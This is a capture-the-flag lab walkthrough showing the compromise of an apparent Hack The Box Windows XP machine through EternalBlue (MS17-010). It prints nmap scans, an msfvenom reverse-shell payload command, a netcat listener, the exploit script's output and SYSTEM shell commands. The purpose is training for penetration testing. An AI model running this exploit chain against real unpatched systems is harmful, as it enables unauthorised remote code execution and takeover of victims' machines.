Step 1. Reconnaissance.

After planning and scoping, the first step in every penetration testing is Information Gathering and Vulnerability Identification or simply Reconnaissance. Most testers start with nmap, a powerful tool to determine open ports and services behind them. We’ll use a default nmap scan that checks the 1,000 most popular ports of each protocol (TCP and UDP). However, I encourage you to scan the entire port range 1–65535. It’s best to run a full scan on the background while you can proceed with your penetration testing. The goal is to get additional ideas to exploit a target machine if you ever get stuck exploiting the services found during the standard scan.

The list of well-known ports can be found here — link.

Run default nmap scan (TCP)

The flags used are explained below:

[email protected]:~# nmap 10.10.10.4 -sC -sV -O -oN /root/Desktop/nmap

-sC — equivalent to -script=default
-sV — Probe open ports to determine service/version info
-O — Enable OS detection
-oN /root/Desktop/nmap — save normal output to a file

Starting Nmap 7.80 ( https://nmap.org ) at 2019–09–28 00:01 EDT
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%), Microsoft Windows 2000 Server (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h37m58s, deviation: 2h07m16s, median: -6h07m58s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:a2:cc:0b (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019–09–28T03:53:26+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds

There are two open TCP ports: 139 (netbios-ssn) and 445 (microsoft-ds). You can read about these protocols here: link and link.

Run default nmap scan (UDP)

[email protected]:~# nmap -sU 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019–10–08 12:09 EDT
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 999 open|filtered ports
PORT STATE SERVICE
137/udp open netbios-ns

Nmap done: 1 IP address (1 host up) scanned in 12.88 seconds

There is one open UDP port: 137 (netbios-ns).

Enumerate SMB protocol

To move forward with our testing, we need to enumerate services running on TCP 139, TCP 445 and UDP 137 to see if they are vulnerable. To achieve this, we will use the pre-canned nmap scripts with “smb-vuln*” wildcard.

[email protected]:~# nmap — script smb-vuln* -p 137,139,445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019–10–08 17:18 EDT
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
PORT STATE SERVICE
137/tcp filtered netbios-ns
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08–067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08–067)
| State: VULNERABLE
| IDs: CVE:CVE-2008–4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008–10–23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08–067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10–054: false
|_smb-vuln-ms10–061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17–010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17–010)
| State: VULNERABLE
| IDs: CVE:CVE-2017–0143

| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17–010).
|
| Disclosure date: 2017–03–14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds

As you can see, there are two vulnerabilities found by nmap scripts:
CVE-2008–4250
CVE-2017–0143

Both are high-severity vulnerabilities, so chances are we’ll be able to exploit any of the two on the target machine.

For this exercise, we will exploit the second vulnerability CVE-2017–0143 called EternalBlue. For those who don’t know, this vulnerability is one of the most damaging vulnerabilities to date. According to Wikipedia, the exploitations of EternalBlue (WannaCry, NotPetya and BadRabbit) caused over $1 billion worth of damages in over 65 countries. Apparently, the vulnerability was first discovered by National Security Agency (NSA) and used as a zero-day exploit until it was leaked by the Shadow Brokers hacker group in April 2017.

Step 2. Weaponization

A quick Google search shows that there are quite a few Python scripts available on GitHub that can be used to exploit the EternalBlue vulnerability. We will use the one found at https://github.com/helviojunior/MS17-010. Unlike some other scripts I’ve come across, this one can be used against different Windows platforms and does some leg work for you when it comes to guessing key parameters such as pipes.

Download Python Script

[email protected]:~# git clone https://github.com/helviojunior/MS17-010
Cloning into ‘MS17–010’…
remote: Enumerating objects: 202, done.
remote: Total 202 (delta 0), reused 0 (delta 0), pack-reused 202
Receiving objects: 100% (202/202), 118.50 KiB | 1.97 MiB/s, done.
Resolving deltas: 100% (115/115), done.

Generate Reverse-Shell Payload

In order to generate a reverse-shell payload, we will use MSFVenom available through Metasploit Framework. Even though MSFVenom is part of Metasploit Framework, it is allowed during the OSCP exam without any limitation.

[email protected]:~/MS17–010# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=2225 -f exe > ms17–010.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

The newly generated payload (ms17–010.exe) defines that our target machine will have to establish a reverse shell to Kali Linux (current IP: 10.10.14.4) on a TCP port 2225. I saved the payload into the same directory where I downloaded the Python script that exploits the EternalBlue vulnerability.

Start Netcat Listener

As defined in the payload, Netcat will listen on port 2225.

[email protected]:~# nc -nvlp 2225
listening on [any] 2225 …

Step 3. Delivery / Exploitation / Command and Control

All three steps — Delivery, Exploitation, and Command and Control will happen at the same time as soon as we execute the Python script which will deliver and run our newly generated payload to give us a control on the target machine. There is no Installation in this penetration testing.

Run Python Script

[email protected]:~/MS17–010# python send_and_execute.py 10.10.10.4 ms17–010.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82047a80
SESSION: 0xe1227968
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe125bc30
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe125bcd0
overwriting token UserAndGroups
Sending file C862OZ.exe…
Opening SVCManager on 10.10.10.4…..
Creating service bHrD…..
Starting service bHrD…..
The NETBIOS connection with the remote host timed out.
Removing service bHrD…..
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

Verify Netcat Listener

Once the Python script has been run, we should be able to see an incoming connection to Netcat from the target machine. It means that we have now got a reverse shell.

[email protected]:~/MS17–010# nc -nvlp 2225
listening on [any] 2225 …
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1045
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985–2001 Microsoft Corp.
C:\WINDOWS\system32>

Step 4. Actions on Objectives

The last step in this penetration testing is to capture two flags: one in user.txt, and another one in root.txt. To be able to access both files, we need to make sure we got a superuser privilege on the target machine. The equivalent of root on Windows is NT AUTHORITY\SYSTEM.

Execute Standard Commands to Find Current User

If we had meterpreter (part of Metasploit Framework), we would execute getuid, but use of meterpreter is limited during the OSCP exam. Most distributives of Linux have whoami for exactly the same purpose. However, the target machine is running Windows that does not have any of these programs. And, for some strange reason, echo &username% does not display us what we want either.

C:\WINDOWS\system32>echo %username%
echo %username%
%username%

So we need to get whoami on the target machine by running it from the SMB server on Kali machine.

Locate Whoami

[email protected]:~/MS17–010# locate whoami
/usr/bin/ldapwhoami
/usr/bin/whoami
/usr/share/bash-completion/completions/ldapwhoami
/usr/share/man/man1/ldapwhoami.1.gz
/usr/share/man/man1/whoami.1.gz
/usr/share/windows-resources/binaries/whoami.exe

Whoami.exe is located at /usr/share/windows resources/binaries/whoami.exe

Locate SMB Server

[email protected]:~/MS17–010# locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python2.7/dist-packages/impacket/smbserver.py
/usr/share/doc/python-impacket/examples/smbserver.py

SMB server is located at /usr/lib/python2.7/dist-packages/impacket.

Start SMB Server and Move Whoami to TEMP

The following command will start the SMB server on Kali machine and move whoami.exe file to TEMP directory accessible via SMB:

[email protected]:~/MS17–010# sudo /usr/share/doc/python-impacket/examples/smbserver.py temp /usr/share/windows-binaries/
Impacket v0.9.19 — Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8–1670–01D3–1278–5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112–3610–9833–46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Verify if SMB Server is Running

[email protected]:~/MS17–010# smbclient //10.10.14.4/temp
Enter WORKGROUP\root’s password:
Try “help” to get a list of possible commands.
smb: \>

Now we will go back to SMB server terminal and verify if there is any new messages. If so, it means that SMB server is running.

[*] Incoming connection (10.10.14.4,50798)
[*] AUTHENTICATE_MESSAGE (WORKGROUP\root,KALI)
[*] User root\KALI authenticated successfully
[*] root::WORKGROUP:4141414141414141:02e921c283035c75375630488a8577f8:010100000000000080a37360127ed50114d7af66f62da17200000000010010007800750076006a006c004e006d0056000200100074006a007200790069006b0049007300030010007800750076006a006c004e006d0056000400100074006a007200790069006b00490073000700080080a37360127ed501060004000200000008003000300000000000000000000000000000005f676d5e0aa7c7af521fdfdeac595c2d0c54d95c031a73f8311be296a91c7de80a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e00340000000000

Yes, SMB Server is Running.

Verify if TEMP Contains Whoami

The following command will help us verify if our fileshare TEMP contains whoami.exe file (it does!):

[email protected]:~/MS17–010# smbclient //10.10.14.4/temp
Enter WORKGROUP\root’s password:
Try “help” to get a list of possible commands.
smb: \> ls
. D 4096 Mon Sep 9 09:56:18 2019
.. D 4096 Mon Sep 9 09:56:18 2019
exe2bat.exe AN 53248 Wed Jul 17 05:31:43 2019
vncviewer.exe AN 364544 Wed Jul 17 05:31:43 2019
radmin.exe AN 704512 Wed Jul 17 05:31:43 2019
nc.exe AN 59392 Wed Jul 17 05:31:43 2019
fgdump D 4096 Mon Sep 9 09:56:18 2019
wget.exe AN 308736 Wed Jul 17 05:31:43 2019
klogger.exe AN 23552 Wed Jul 17 05:31:43 2019
whoami.exe AN 66560 Wed Jul 17 05:31:43 2019
nbtenum D 4096 Mon Sep 9 09:56:18 2019
plink.exe AN 311296 Wed Jul 17 05:31:43 2019
fport D 4096 Mon Sep 9 09:56:18 2019
mbenum D 4096 Mon Sep 9 09:56:18 2019
enumplus D 4096 Mon Sep 9 09:56:18 2019
148529400 blocks of size 7680. 148529400 blocks available
smb: \>

Execute Whoami on Target

The remaining part is to run whoami.exe on the target machine over SMB:

C:\WINDOWS\system32>\\10.10.14.4\temp\whoami.exe
\\10.10.14.4\temp\whoami.exe
NT AUTHORITY\SYSTEM

Find User and Root Flags

user.txt

User flag is normally located on a desktop of a normal user (C:\Documents and Settings\User\Desktop).

C:\WINDOWS\system32>cd..
cd..
C:\WINDOWS>cd..
cd..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� <DIR> Documents and Settings
16/03/2017 08:33 �� <DIR> Program Files
07/10/2019 08:15 �� <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.484.275.200 bytes free
C:\>cd documents and settings
cd documents and settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 �� <DIR> .
16/03/2017 09:07 �� <DIR> ..
16/03/2017 09:07 �� <DIR> Administrator
16/03/2017 08:29 �� <DIR> All Users
16/03/2017 08:33 �� <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.484.275.200 bytes free
C:\Documents and Settings>cd john
cd john
C:\Documents and Settings\john>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john
16/03/2017 08:33 �� <DIR> .
16/03/2017 08:33 �� <DIR> ..
16/03/2017 09:19 �� <DIR> Desktop
16/03/2017 08:33 �� <DIR> Favorites
16/03/2017 08:33 �� <DIR> My Documents
16/03/2017 08:20 �� <DIR> Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.484.275.200 bytes free
C:\Documents and Settings\john>cd desktop
cd desktop
C:\Documents and Settings\john\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 �� <DIR> .
16/03/2017 09:19 �� <DIR> ..
16/03/2017 09:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.484.275.200 bytes free
C:\Documents and Settings\john\Desktop>more user.txt
more user.txt
e69af0e……………… (redacted)

We successfully found a user flag.

root.txt

User flag is normally located on a desktop of Administrator (C:\Documents and Settings\Administrator\Desktop).

C:\Documents and Settings>cd administrator
cd administrator
C:\Documents and Settings\Administrator>cd desktop
cd desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 �� <DIR> .
16/03/2017 09:18 �� <DIR> ..
16/03/2017 09:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.484.217.856 bytes free
C:\Documents and Settings\Administrator\Desktop>more root.txt
more root.txt
993442d…..……… (redacted)